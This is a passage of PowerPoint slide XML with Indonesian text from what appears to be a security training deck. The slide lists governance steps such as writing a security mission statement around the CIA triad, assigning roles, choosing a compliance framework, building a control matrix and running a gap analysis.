              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kategori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Panduan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Merangkum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Buat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menekankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CIA: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SOC, CIRT, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Buat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>matriks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kategori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesenjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
